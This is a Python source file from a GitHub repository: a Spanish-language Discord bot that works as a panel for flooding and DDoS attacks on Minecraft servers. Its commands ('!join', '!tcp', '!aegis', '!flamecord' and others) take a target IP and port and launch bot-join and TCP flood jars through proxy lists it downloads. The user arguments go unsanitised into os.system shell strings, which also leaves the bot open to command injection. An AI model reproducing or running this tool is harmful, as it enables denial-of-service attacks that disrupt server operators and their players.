-
Notifications
You must be signed in to change notification settings - Fork 4
/
bot.py
369 lines (297 loc) · 14 KB
/
bot.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
import discord
from discord.ext import commands
import os
import threading
import requests
import urllib.request
import json
import asyncio
import sqlite3
from discord import Member
token = "token"
client = commands.Bot(command_prefix='!')
client.remove_command('help')
@client.event
async def on_ready():
await client.change_presence(status=discord.Status.idle, activity=discord.Game(name='Bot de SirWorldBan :3'))
print("Bot Incrustado cargado!")
@client.command()
async def proxy(ctx):
def update():
os.system('rm socks4.txt')
os.system('wget https://api.openproxylist.xyz/socks4.txt')
t1 = threading.Thread(target=update)
t1.start()
await ctx.send("Proxy actualizado")
@client.command()
@commands.has_permissions(manage_messages=True)
async def stop(ctx):
os.system("pkill 'java'")
embed = discord.Embed(
title='Ataque detenido!',
description=f'Todo ataque se detuvo exitosamente!',
color=discord.Colour.orange()
)
await ctx.send(embed=embed)
@client.command()
async def join(ctx, arg1, arg2, arg3):
def attack():
os.system(
f"screen -d -m timeout 30 java -Dperdelay=2500 -Ddelay=1 -Drmnwp=false -jar LegitBootV8.jar {arg1}:{arg2} 2 35 {arg3} 160 socks4.txt socks4")
embed = discord.Embed(
title='Ataque enviado!',
description=f'Ataque enviado con éxito!',
color=discord.Colour.orange()
)
embed.add_field(name='ip:', value=f'{arg1}', inline=False)
embed.add_field(name='puerto:', value=f'{arg2}', inline=False)
embed.add_field(name='method:', value='join', inline=False)
embed.add_field(name='duracion:', value=f'60 segundos', inline=False)
embed.add_field(name='protocol:', value=f'{arg3}', inline=False)
embed.set_thumbnail(
url='https://cdn.discordapp.com/icons/871060573079617576/0f742e28a436bbf091abd9a330f16fba.png')
embed.set_image(url=f'http://status.mclive.eu/SirWorldBan/{arg1}/{arg2}/banner.png')
embed.set_footer(text="Discord.nortoncraft.club")
t1 = threading.Thread(target=attack)
t1.start()
await ctx.send(embed=embed)
@client.command()
async def randombytes(ctx, arg1, arg2, arg3):
def attack():
os.system(
f"screen -d -m timeout 30 java -Dperdelay=2500 -Ddelay=1 -Drmnwp=false -jar LegitBootV8.jar {arg1}:{arg2} 3 35 {arg3} 160 socks4.txt socks4")
embed = discord.Embed(
title='Ataque enviado!',
description=f'Ataque enviado con éxito!',
color=discord.Colour.orange()
)
embed.add_field(name='ip:', value=f'{arg1}', inline=False)
embed.add_field(name='puerto:', value=f'{arg2}', inline=False)
embed.add_field(name='method:', value='RandomBytes', inline=False)
embed.add_field(name='duracion:', value=f'60 segundos', inline=False)
embed.add_field(name='protocol:', value=f'{arg3}', inline=False)
embed.set_thumbnail(
url='https://cdn.discordapp.com/icons/871060573079617576/0f742e28a436bbf091abd9a330f16fba.png')
embed.set_image(url=f'http://status.mclive.eu/SirWorldBan/{arg1}/{arg2}/banner.png')
embed.set_footer(text="Discord.nortoncraft.club")
t1 = threading.Thread(target=attack)
t1.start()
await ctx.send(embed=embed)
@client.command()
async def motd(ctx, arg1, arg2, arg3):
def attack():
os.system(
f"java -Dperdelay=2500 -Ddelay=1 -Drmnwp=false -jar LegitBootV8.jar {arg1}:{arg2} 1 35 {arg3} 160 socks4.txt socks4")
embed = discord.Embed(
title='Ataque enviado!',
description=f'Ataque enviado con éxito!',
color=discord.Colour.orange()
)
embed.add_field(name='ip:', value=f'{arg1}', inline=False)
embed.add_field(name='puerto:', value=f'{arg2}', inline=False)
embed.add_field(name='method:', value='Motd', inline=False)
embed.add_field(name='duracion:', value=f'60 segundos', inline=False)
embed.add_field(name='protocol:', value=f'{arg3}', inline=False)
embed.set_thumbnail(
url='https://cdn.discordapp.com/icons/871060573079617576/0f742e28a436bbf091abd9a330f16fba.png')
embed.set_image(url=f'http://status.mclive.eu/SirWorldBan/{arg1}/{arg2}/banner.png')
embed.set_footer(text="Discord.nortoncraft.club")
t1 = threading.Thread(target=attack)
t1.start()
await ctx.send(embed=embed)
@client.command()
async def join2(ctx, arg1, arg2):
def attack():
os.system(
f"java -jar mango.jar host={arg1} port={arg2} pfile=socks4.txt resolve=false threads=450000 time=80 method=ping_join version=754")
os.system(f"")
embed = discord.Embed(
title='Ataque enviado!',
description=f'Ataque enviado con éxito!',
color=discord.Colour.orange()
)
embed.add_field(name='ip:', value=f'{arg1}', inline=False)
embed.add_field(name='puerto:', value=f'{arg2}', inline=False)
embed.add_field(name='duracion:', value=f'60 segundos', inline=False)
embed.add_field(name='method:', value='JOIN4', inline=False)
embed.set_thumbnail(
url='https://cdn.discordapp.com/icons/871060573079617576/0f742e28a436bbf091abd9a330f16fba.png')
embed.set_image(url=f'http://status.mclive.eu/SirWorldBan/{arg1}/{arg2}/banner.png')
embed.set_footer(text="Discord.nortoncraft.club")
t1 = threading.Thread(target=attack)
t1.start()
await ctx.send(embed=embed)
@client.command()
async def tcp(ctx, arg1, arg2):
def attack():
os.system(
f"java -Dperdelay=2500 -Ddelay=1 -Drmnwp=false -Dr=false -Dlen=25555 -jar tcp.jar {arg1} 7 9000 {arg2} 60 socks4_proxies.txt socks4")
os.system(f"")
embed = discord.Embed(
title='Ataque enviado!',
description=f'Ataque enviado con éxito!',
color=discord.Colour.orange()
)
embed.add_field(name='ip:', value=f'{arg1}', inline=False)
embed.add_field(name='protocolo:', value=f'{arg2}', inline=False)
embed.add_field(name='duracion:', value=f'60 segundos', inline=False)
embed.add_field(name='method:', value='TCP-JOIN-BOT', inline=False)
embed.set_thumbnail(
url='https://cdn.discordapp.com/icons/871060573079617576/0f742e28a436bbf091abd9a330f16fba.png')
embed.set_image(url=f'http://status.mclive.eu/SirWorldBan/{arg1}/banner.png')
embed.set_footer(text="Discord.nortoncraft.club")
t1 = threading.Thread(target=attack)
t1.start()
await ctx.send(embed=embed)
@client.command()
async def tcp1(ctx, arg1, arg2):
def attack():
os.system(
f"java -Dperdelay=2500 -Ddelay=1 -Drmnwp=false -Dr=false -Dlen=25555 -jar tcp.jar {arg1} 5 9000 {arg2} 60 socks4_proxies.txt socks4")
os.system(f"")
embed = discord.Embed(
title='Ataque enviado!',
description=f'Ataque enviado con éxito!',
color=discord.Colour.orange()
)
embed.add_field(name='ip:', value=f'{arg1}', inline=False)
embed.add_field(name='protocolo:', value=f'{arg2}', inline=False)
embed.add_field(name='duracion:', value=f'60 segundos', inline=False)
embed.add_field(name='method:', value='TCP-PING-JOIN', inline=False)
embed.set_thumbnail(
url='https://cdn.discordapp.com/icons/871060573079617576/0f742e28a436bbf091abd9a330f16fba.png')
embed.set_image(url=f'http://status.mclive.eu/SirWorldBan/{arg1}/banner.png')
embed.set_footer(text="Discord.nortoncraft.club")
t1 = threading.Thread(target=attack)
t1.start()
await ctx.send(embed=embed)
@client.command()
async def bungee(ctx, arg1):
def attack():
os.system(
f"java -Dperdelay=2500 -Ddelay=1 -Drmnwp=false -Dr=false -Dlen=25555 -jar tcp.jar {arg1} 3 9000 4 60 socks4_proxies.txt socks4")
os.system(f"")
embed = discord.Embed(
title='Ataque enviado!',
description=f'Ataque enviado con éxito!',
color=discord.Colour.orange()
)
embed.add_field(name='ip:', value=f'{arg1}', inline=False)
embed.add_field(name='duracion:', value=f'60 segundos', inline=False)
embed.add_field(name='method:', value='BUNGEE-JOIN-BOT', inline=False)
embed.set_thumbnail(
url='https://cdn.discordapp.com/icons/871060573079617576/0f742e28a436bbf091abd9a330f16fba.png')
embed.set_image(url=f'http://status.mclive.eu/SirWorldBan/{arg1}/banner.png')
embed.set_footer(text="Discord.nortoncraft.club")
t1 = threading.Thread(target=attack)
t1.start()
await ctx.send(embed=embed)
@client.command()
async def help(ctx):
embed = discord.Embed(
title="Métodos",
color=discord.Colour.red()
)
embed.add_field(name='Join SOLO 1.8', value='!join <ip> <puerto> <protocol>')
embed.add_field(name='Ping SOLO 1.16.X', value='!join2 <ip> <puerto>', inline=False)
embed.add_field(name='Flamecord', value='!flamecord <ip> <puerto>', inline=False)
embed.add_field(name='Aegis', value='!aegis <ip> <puerto>', inline=False)
embed.add_field(name='RandomBytes', value='!randombytes <ip> <puerto> <protocol>', inline=False)
embed.add_field(name='Nantibot (beta 0.0.1)', value='!nantibot <ip> <puerto>', inline=False)
embed.add_field(name='Motd', value='!motd <ip> <puerto> <protocol>', inline=False)
embed.add_field(name='TCP JOIN', value='!tcp <dominio> <protocol>', inline=False)
embed.add_field(name='TCP PING', value='!tcp1 <dominio> <protocol>', inline=False)
embed.add_field(name='BUNGEECORD JOIN', value='!bungee <dominio>', inline=False)
embed.add_field(name='Sacar ip Numerica', value='!mc <dominio>', inline=False)
embed.set_thumbnail(
url='https://cdn.discordapp.com/icons/871060573079617576/0f742e28a436bbf091abd9a330f16fba.png')
embed.set_footer(text="Discord.nortoncraft.club")
await ctx.send(embed=embed)
@client.command()
async def mc(ctx, arg1):
url = "https://api.mcsrvstat.us/2/" + arg1
file = urllib.request.urlopen(url)
for line in file:
decoded_line = line.decode("utf-8")
json_object = json.loads(decoded_line)
embed = discord.Embed(
title="Resuelto!",
color=discord.Colour.red()
)
embed.add_field(name="Host:", value=json_object["hostname"], inline=False)
embed.add_field(name='IP Numerica:', value=json_object["ip"], inline=False)
embed.add_field(name='puerto:', value=json_object["port"], inline=False)
embed.add_field(name="Protocolo:", value=json_object["protocol"], inline=False)
embed.add_field(name="Server En línea:", value=json_object["online"], inline=False)
g = json_object["ip"]
gb = json_object["port"]
embed.set_thumbnail(
url='https://cdn.discordapp.com/icons/871060573079617576/0f742e28a436bbf091abd9a330f16fba.png')
embed.set_image(url=f'http://status.mclive.eu/SirWorldBan/{g}/{gb}/banner.png')
embed.set_footer(text="Discord.nortoncraft.club")
await ctx.send(embed=embed)
@client.command()
async def aegis(ctx, arg1, arg2):
def attack():
os.system(
f"screen -d -m java -jar SynexHub_obf.jar host={arg1} port={arg2} threads=10000 file=socks4.txt method=aegis timeout=1000 loop=300")
os.system(f"")
embed = discord.Embed(
title='Ataque enviado!',
description=f'Ataque enviado con éxito!',
color=discord.Colour.orange()
)
embed.add_field(name='ip:', value=f'{arg1}', inline=False)
embed.add_field(name='puerto:', value=f'{arg2}', inline=False)
embed.add_field(name='method:', value='join', inline=False)
embed.add_field(name='protocol:', value=f'1.8', inline=False)
embed.set_thumbnail(
url='https://cdn.discordapp.com/icons/871060573079617576/0f742e28a436bbf091abd9a330f16fba.png')
embed.set_image(url=f'http://status.mclive.eu/SirWorldBan/{arg1}/{arg2}/banner.png')
embed.set_footer(text="Discord.nortoncraft.club")
t1 = threading.Thread(target=attack)
t1.start()
await ctx.send(embed=embed)
@client.command()
async def flamecord(ctx, arg1, arg2):
def attack():
os.system(
f"java -jar SynexHub_obf.jar host={arg1} port={arg2} threads=25000 file=socks4.txt method=bypass timeout=1000 loop=300")
embed = discord.Embed(
title='Ataque enviado!',
description=f'Ataque enviado con éxito!',
color=discord.Colour.orange()
)
embed.add_field(name='ip:', value=f'{arg1}', inline=False)
embed.add_field(name='puerto:', value=f'{arg2}', inline=False)
embed.add_field(name='method:', value='ShitCord (flamecord) bypass', inline=False)
embed.add_field(name='protocol:', value='47', inline=False)
embed.set_thumbnail(
url='https://cdn.discordapp.com/icons/871060573079617576/0f742e28a436bbf091abd9a330f16fba.png')
embed.set_image(url=f'http://status.mclive.eu/SirWorldBan/{arg1}/{arg2}/banner.png')
embed.set_footer(text="Discord.nortoncraft.club")
t1 = threading.Thread(target=attack)
t1.start()
await ctx.send(embed=embed)
@client.command()
async def nantibot(ctx, arg1, arg2):
def attack():
os.system(
f"java -jar SynexHub_obf.jar host={arg1} port={arg2} threads=18000 file=socks4.txt method=bypass timeout=1000 loop=300")
embed = discord.Embed(
title='Ataque enviado!',
description=f'Ataque enviado con éxito!',
color=discord.Colour.orange()
)
embed.add_field(name='ip:', value=f'{arg1}', inline=False)
embed.add_field(name='puerto:', value=f'{arg2}', inline=False)
embed.add_field(name='method:', value='Nantibot (beta) bypass', inline=False)
embed.add_field(name='protocol:', value='4', inline=False)
embed.set_thumbnail(
url='https://cdn.discordapp.com/icons/871060573079617576/0f742e28a436bbf091abd9a330f16fba.png')
embed.set_image(url=f'http://status.mclive.eu/SirWorldBan/{arg1}/{arg2}/banner.png')
embed.set_footer(text="Discord.nortoncraft.club")
t1 = threading.Thread(target=attack)
t1.start()
await ctx.send(embed=embed)
client.run(token)